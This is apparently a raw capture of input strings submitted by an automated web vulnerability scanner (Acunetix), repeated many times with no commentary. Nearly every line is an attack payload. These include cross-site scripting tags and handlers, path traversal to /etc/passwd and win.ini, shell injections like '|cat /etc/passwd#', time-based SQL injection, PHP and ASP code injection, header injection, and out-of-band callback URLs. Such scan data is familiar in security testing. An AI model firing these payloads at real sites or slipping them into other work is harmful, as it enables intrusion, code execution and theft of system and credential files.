1<input autofocus onfocus=prompt(947154)>

1some_inexistent_file_with_long_name%00.jpg

1

1

SqvDJD4f'

.\./.\./.\./.\./.\./.\./etc/passwd

"|"ld

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/etc/passwd

1

d6Bgmpq1')

^(#$!@#$)(()))******

1

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

p8wOouA1')

'

1

1_JnYOb <ScRiPt >prompt(931898)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

yu0bxJJX')

1

1

"

1

acunetix_wvs_invalid_filename

................etc/passwd

http://hitun1bBomhXq.bxss.me/

||cat /etc/passwd

1

vbd2kgGs'))

1

1

1

${@print(md5(acunetix_wvs_security_test))}

comments

1

&dir

1

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

'"

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

-1)

"&dir&"

1

1'"()&%<ScRiPt >prompt(987576)</ScRiPt>

1

1

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(961449)</ScRiPt>

1

|dir

1

1

WEB-INF\web.xml

1

1

1_916548

'|dir

-1))

1

1

../../../../../../../../../../windows/win.ini

1

1

FAlkOztE'

"|dir

1

1

../../../../../../../../../../boot.ini

acu1799<s1﹥s2ʺs3ʹuca1799

1

y1hQvpX3')

1

1

acux5994z1z2abcxuca5994

../../../../../../../../../../windows/win.ini.jpg

S4r7XIvo'))

1

1

1<ScRiPt >prompt(976852)</ScRiPt>

1

1

windowswin.ini

1<script>prompt(934373)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(953716)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?922640></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(916546)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(981628)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999964)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(962858))>

1

1<iframe src='data:text/html

1

1

response.write(9071622*9344222)

WEB-INF/web.xml

1

1<body onload=prompt(949216)>

1

WEB-INF\web.xml

1

1

'+response.write(9071622*9344222)+'

1

&cat /etc/passwd&

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911904)>

1

1

1

"+response.write(9071622*9344222)+"

1

1

1

1<img src=xyz OnErRor=prompt(911372)>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

1

"&cat /etc/passwd&"

1<img/src=">" onerror=alert(968536)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1

1

1<ScRiPt%20>prompt(955132)</sCripT>

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&lt

`cat /etc/passwd`

-1

1

${99827+100316}

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

<img acu onmouseover=prompt(947222) //>

1

-1)

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n994223=v955074

1some_inexistent_file_with_long_name%00.jpg

1<input autofocus onfocus=prompt(971163)>

1

-1))

1

1

)

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

36KSWw6t'

1

1

!(()&&!|*|*|

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

Ggs7x0TN')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

'

1

1_EeVMy <ScRiPt >prompt(932848)</ScRiPt>

WbuVUcg5'))

1

1

1

'

1

1

"

-1

/etc/passwd

1

1

1

1

1

"

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitH7Kr3iAWcU.bxss.me/

1

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

comments

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

a9fWDmxF'

comments

1

1

'&dir&'

................etc/passwd

1

1

R9YgqW77')

'"

1

comments/.

1'"()&%<ScRiPt >prompt(936083)</ScRiPt>

1

1

"&dir&"

g4ML9vZH'))

<!--

1

1

'"()&%<ScRiPt >prompt(943398)</ScRiPt>

file:///etc/passwd

1

1

1

1

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1_903394

1

1

1

'|dir

WEB-INF/web.xml

"|dir

1

1

WEB-INF\web.xml

acu9683<s1﹥s2ʺs3ʹuca9683

1

1

1

1

../../../../../../../../../../windows/win.ini

acux2276z1z2abcxuca2276

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(997758)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

windowswin.ini

1

1<script>prompt(964981)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(930384)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949938></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(915481)</ScRiPt>

1

1

response.write(9426447*9827098)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(915209)">

1

'+response.write(9426447*9827098)+'

&cat /etc/passwd&

1

"+response.write(9426447*9827098)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931833)"></g></svg>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

1<div style=width:expression(prompt(963021))>

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(975860)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

${99956+99088}

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916441)>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<img src=xyz OnErRor=prompt(964009)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1))

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n909861=v911665

1<img/src=">" onerror=alert(983151)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

qcQ0ighv'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

'|'ld

1<ScRiPt%20>prompt(975938)</sCripT>

1

testasp.vulnweb.com

1

tYTqJ1Do')

.\./.\./.\./.\./.\./.\./etc/passwd

1

!(()&&!|*|*|

"|"ld

'"()

1

1&lt

^(#$!@#$)(()))******

1

B5JZg9s7'))

/etc/passwd

1

1

1

<img acu onmouseover=prompt(925093) //>

-1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1)

1<input autofocus onfocus=prompt(953875)>

'

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

-1))

1

"

1

http://hitcs69gY9vr7.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

................etc/passwd

acunetix_wvs_invalid_filename

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

R6n8MGJh'

[url=http://www.acunetix.com]website security[/url]

1

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

&dir

1

xZY26Rr8')

file:///etc/passwd

1

http://www.acunetix.tst

1_xBh0u <ScRiPt >prompt(976485)</ScRiPt>

1

comments

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

TFyTXFWp'))

'"

1'"()&%<ScRiPt >prompt(920403)</ScRiPt>

1

1

comments/.

1

1

"&dir&"

WEB-INF/web.xml

1

<!--

'"()&%<ScRiPt >prompt(985533)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1_932891

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

acu10962<s1﹥s2ʺs3ʹuca10962

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

acux9128z1z2abcxuca9128

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(929231)</ScRiPt>

1

windowswin.ini

1

1<script>prompt(942272)</script>

1

1

1

1

................windowswin.ini

1<ScRiPt >prompt(998303)</ScRiPt>

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900809></ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(945235)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(976274)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926122)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(908633))>

WEB-INF/web.xml

1

1

response.write(9397779*9752460)

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

'+response.write(9397779*9752460)+'

&cat /etc/passwd&

1

1<body onload=prompt(988475)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"+response.write(9397779*9752460)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968870)>

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=xyz OnErRor=prompt(992607)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

cat /etc/passwd

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(931014)>

1

1

`cat /etc/passwd`

1

1

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(934205)</sCripT>

${99554+99152}

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

1

1&lt

1

1&n900251=v951510

'|'ld

1some_inexistent_file_with_long_name%00.jpg

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

<img acu onmouseover=prompt(907177) //>

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

i44Pfv5Y'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<input autofocus onfocus=prompt(980672)>

'"()

testasp.vulnweb.com

1

^(#$!@#$)(()))******

BKSTF9O0')

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

'

'

1

1

1

2i32QrPW'))

1

1

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

1_cCffb <ScRiPt >prompt(969413)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitgNPY0Svd3i.bxss.me/

................etc/passwd

acunetix_wvs_invalid_filename

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

comments

-1))

'&dir&'

1

1

1

http://www.acunetix.tst

1

1

file:///etc/passwd

comments

rDgFh600'

1

'"

1'"()&%<ScRiPt >prompt(927048)</ScRiPt>

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

qB74u1tf')

1

<!--

'"()&%<ScRiPt >prompt(979832)</ScRiPt>

1

1

|dir

WEB-INF/web.xml

1

j7jz9hbp'))

1

1_978004

1

1

WEB-INF\web.xml

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu4976<s1﹥s2ʺs3ʹuca4976

"|dir

1

1

../../../../../../../../../../boot.ini

1

acux3520z1z2abcxuca3520

1

1

1

1<ScRiPt >prompt(993102)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(951023)</script>

1

1

windowswin.ini

1<ScRiPt >prompt(960662)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902272></ScRiPt>

1

1<ScRiPt >prompt(903077)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(950629)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962863)"></g></svg>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(909313))>

1

response.write(9533932*9339430)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

'+response.write(9533932*9339430)+'

1

1

1

1

1<body onload=prompt(984611)>

"+response.write(9533932*9339430)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961272)>

1

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(901905)>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1<img/src=">" onerror=alert(925053)>

if(now()=sysdate(),sleep(9.888),0)/*'XOR(if(now()=sysdate(),sleep(9.888),0))OR'"XOR(if(now()=sysdate(),sleep(9.888),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1

${99240+99452}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1<ScRiPt%20>prompt(903430)</sCripT>

1

(select(0)from(select(sleep(9.888)))v)/*'+(select(0)from(select(sleep(9.888)))v)+'"+(select(0)from(select(sleep(9.888)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1&lt

`cat /etc/passwd`

1some_inexistent_file_with_long_name%00.jpg

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n936775=v921984

<img acu onmouseover=prompt(910264) //>

)

|cat /etc/passwd#

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(935656)>

1

1

!(()&&!|*|*|

testasp.vulnweb.com

'"()

'|'ld

-1))

1

.\./.\./.\./.\./.\./.\./etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

1

1

"|"ld

saJE9Qbd'

/etc/passwd

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

IpP8FgzE')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1_W3RJN <ScRiPt >prompt(952232)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

dcMqvMnn'))

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

acunetix_wvs_invalid_filename

1

http://hitYNigHyx2yv.bxss.me/

................etc/passwd

-1

"

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

1

1

1

1

comments

||cat /etc/passwd

1

file:///etc/passwd

1

-1))

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(978293)</ScRiPt>

'"

1

comments/.

&dir

/\../\../\../\../\../\../\../etc/passwd

Pv02g42T'

1

'"()&%<ScRiPt >prompt(975360)</ScRiPt>

1

<!--

1

1

1

'&dir&'

FoFIYA4p')

WEB-INF/web.xml

1_983047

1

1

1

1

WEB-INF\web.xml

KUVdXu7F'))

"&dir&"

1

1

1

|dir

1

1

../../../../../../../../../../windows/win.ini

acu7643<s1﹥s2ʺs3ʹuca7643

1

acux1608z1z2abcxuca1608

1

'|dir

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(904494)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

"|dir

1

windowswin.ini

1

1<script>prompt(900329)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974611)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?925179></ScRiPt>

1

1<ScRiPt >prompt(907976)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(972626)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928851)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(920519))>

1

1

1

1<iframe src='data:text/html

1

1

1

response.write(9713952*9224991)

WEB-INF/web.xml

1<body onload=prompt(907185)>

&cat /etc/passwd&

1

1

1

'+response.write(9713952*9224991)+'

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985182)>

WEB-INF\web.xml

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

"+response.write(9713952*9224991)+"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965207)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(927160)>

1<ScRiPt%20>prompt(949451)</sCripT>

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(6.218),0)/*'XOR(if(now()=sysdate(),sleep(6.218),0))OR'"XOR(if(now()=sysdate(),sleep(6.218),0))OR"*/

1

1

1&lt

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99411+99660}

(select(0)from(select(sleep(6.218)))v)/*'+(select(0)from(select(sleep(6.218)))v)+'"+(select(0)from(select(sleep(6.218)))v)+"*/

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

<img acu onmouseover=prompt(925360) //>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1

1

|cat /etc/passwd#

1

1

)

1<input autofocus onfocus=prompt(935234)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n944458=v943791

1some_inexistent_file_with_long_name%00.jpg

-1)

1

'|'ld

1

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

.\./.\./.\./.\./.\./.\./etc/passwd

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

Ug9Wvj1W'

testasp.vulnweb.com

1

1

1

1

1_ENEit <ScRiPt >prompt(991000)</ScRiPt>

'

1ERDaWSb')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

muiF6Vm2'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

................etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

http://hitKHvJ2hUWtV.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

comments

&dir

file:///etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

-1))

1

1

'&dir&'

comments

'"

/\../\../\../\../\../\../\../etc/passwd

1

1

ZRS6fjZq'

1

1'"()&%<ScRiPt >prompt(912169)</ScRiPt>

"&dir&"

1

comments/.

<!--

1

aoqaGjnR')

WEB-INF/web.xml

1

1

|dir

'"()&%<ScRiPt >prompt(925377)</ScRiPt>

1

u3Nb7FuH'))

1

1

'|dir

1

WEB-INF\web.xml

1_992068

1

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu3622<s1﹥s2ʺs3ʹuca3622

1

../../../../../../../../../../windows/win.ini.jpg

acux7541z1z2abcxuca7541

1

1

1

windowswin.ini

1

1<ScRiPt >prompt(970214)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(989504)</script>

1

1

1<ScRiPt >prompt(975395)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993339></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt >prompt(980308)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9600492*9304093)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(931801)">

1

'+response.write(9600492*9304093)+'

1

1

1

"+response.write(9600492*9304093)+"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937310)"></g></svg>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(936108))>

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

1<body onload=prompt(938764)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

`cat /etc/passwd`

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969905)>

-1

${99002+99117}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(993956)>

-1)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n984967=v970821

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(984830)>

'|'ld

)

-1))

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(932787)</sCripT>

1

!(()&&!|*|*|

Vs4UjChh'

"|"ld

/etc/passwd

1

testasp.vulnweb.com

'"()

1

1&lt

^(#$!@#$)(()))******

kjczHgQN')

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

WbkZIUz5'))

'

<img acu onmouseover=prompt(942840) //>

1

"

-1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

"

1<input autofocus onfocus=prompt(901866)>

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

................etc/passwd

http://hit1yDwwZRjTl.bxss.me/

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1))

<a href='http://www.acunetix.com'>website security</a>

1

1

1

comments

1

&dir

6rjrnn4n'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

1

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

'&dir&'

file:///etc/passwd

LT7Rl9LJ')

1

1

comments/.

'"

1

1'"()&%<ScRiPt >prompt(933214)</ScRiPt>

"&dir&"

7rYmMhzn'))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

<!--

1

1_dlK55 <ScRiPt >prompt(963402)</ScRiPt>

1

'"()&%<ScRiPt >prompt(981956)</ScRiPt>

|dir

1

1

WEB-INF/web.xml

1

1

1

1_940622

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

acu10357<s1﹥s2ʺs3ʹuca10357

1

1

1

../../../../../../../../../../boot.ini

1

1

acux4613z1z2abcxuca4613

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1<ScRiPt >prompt(911816)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(985223)</script>

1

1

1

1<ScRiPt >prompt(994601)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?972575></ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1<ScRiPt >prompt(924506)</ScRiPt>

1

1<video><source onerror="javascript:prompt(913156)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911742)"></g></svg>

1

1

1

1<div style=width:expression(prompt(966967))>

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

response.write(9996238*9277920)

1<iframe src='data:text/html

1

1

1

&cat /etc/passwd&

'+response.write(9996238*9277920)+'

1<body onload=prompt(938284)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9996238*9277920)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(941489)>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(929704)>

